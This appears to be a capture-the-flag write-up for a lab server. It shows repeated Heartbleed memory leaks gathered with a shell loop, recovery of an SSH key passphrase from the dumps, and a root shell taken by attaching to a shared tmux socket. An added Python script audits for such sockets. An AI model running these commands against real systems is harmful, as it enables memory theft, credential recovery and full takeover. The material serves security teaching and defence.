NETWORK


SCAN


ENUMERATION
Looking at HTTP on port 80, we see the following:

Looking at the items revealed by the directory scans:

FOOTHOLD
SSH access using private key
Let's download this key to our attack machine.

Trying to use this key to access the server, we are prompted for a passphrase: the private key is encrypted.

Heartbleed
Looking at the headers exposed by the website, we can see that we are dealing with a very old version of Apache and PHP.

We then decided to look into the Heartbleed vulnerability.

Using the exploit found on Exploit-DB (32745.py), we confirmed that the machine is vulnerable to Heartbleed.


Recovering the key passphrase from leaked memory
Let's collect more data by running the exploit repeatedly, dropping the all-zero lines and saving each dump to its own file:
for i in $(seq 1 10000); do python2 32745.py 10.10.10.79 | grep -v "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" > heartbeat-$i; done
We used fdupes to remove duplicate dumps (-f omits the first file of each duplicate set, so one copy is kept):
fdupes -rf . | grep -v '^$' > files; xargs -a files rm -v

The exploit prints a hexdump (offset, 16 hex bytes, then the ASCII column); the 18th whitespace-separated field is that ASCII column, and reading it across the remaining dumps reveals a base64 string:
cat heartbeat-* | awk -F" " '{print $18}'

Decoding this base64 data gives the passphrase for the private key:
echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d
heartbleedbelievethehype
With the passphrase we can write an unencrypted copy of the key (openssl prompts for the passphrase):
openssl rsa -in hype_key -out hype_key_decrypted

SSH as Hype
Using the SSH key and the passphrase from the previous steps, we now have an SSH session on the server as the user hype.

PRIV ESCALATION
Looking at hype's .bash_history, we can see that tmux was used with a custom socket path (-S).

Attaching to that tmux socket, which is owned by root but accessible to hype, gave us a root shell:
tmux -S /.devs/dev_sess
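The root cause of the last step is a privileged tmux server socket that another account can read and write. As an added, defender-side example (not part of the original writeup), the Python script below walks a directory tree, hidden directories included, and reports Unix-domain sockets that a user other than their owner could attach to. The demo() fixture, the .devs/dev_sess and private socket names, and the "uid + 1" stand-in for another unprivileged account are constructed for the demonstration.

```python
import os
import socket
import stat
import tempfile

def audit_unix_sockets(search_roots, caller_uid=None):
    """Report Unix-domain sockets under search_roots that an account other
    than the owner could attach to (group- or world-accessible mode bits)."""
    caller_uid = os.getuid() if caller_uid is None else caller_uid
    findings = []
    for root in search_roots:
        for dirpath, _dirs, filenames in os.walk(root):  # hidden dirs included
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # unreadable, or vanished between listing and stat
                if not stat.S_ISSOCK(st.st_mode):
                    continue
                perm = stat.S_IMODE(st.st_mode)
                reasons = []
                if st.st_uid != caller_uid and perm & (stat.S_IRGRP | stat.S_IWGRP):
                    reasons.append("group-accessible socket owned by another user")
                if perm & (stat.S_IROTH | stat.S_IWOTH):
                    reasons.append("world-accessible socket")
                if reasons:
                    findings.append({"path": path, "uid": st.st_uid,
                                     "mode": oct(perm), "reasons": reasons})
    return findings

def demo():
    """Constructed fixture mirroring the writeup: a hidden directory holding a
    group-shared session socket (0660) next to an owner-only one (0600),
    audited from the viewpoint of a different unprivileged account (uid + 1)."""
    tmp = tempfile.mkdtemp()
    devs = os.path.join(tmp, ".devs")
    os.mkdir(devs)
    socks = []
    for name, mode in (("dev_sess", 0o660), ("private", 0o600)):
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.bind(os.path.join(devs, name))  # creates the socket file on disk
        os.chmod(os.path.join(devs, name), mode)
        socks.append(sock)
    findings = audit_unix_sockets([tmp], caller_uid=os.getuid() + 1)
    for sock in socks:
        sock.close()
    return findings
```

On a real host, run audit_unix_sockets(["/"]) as the low-privilege account you are reviewing; a tmux socket owned by root that shows up here should be removed or recreated with mode 0600 in a directory only root can enter.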
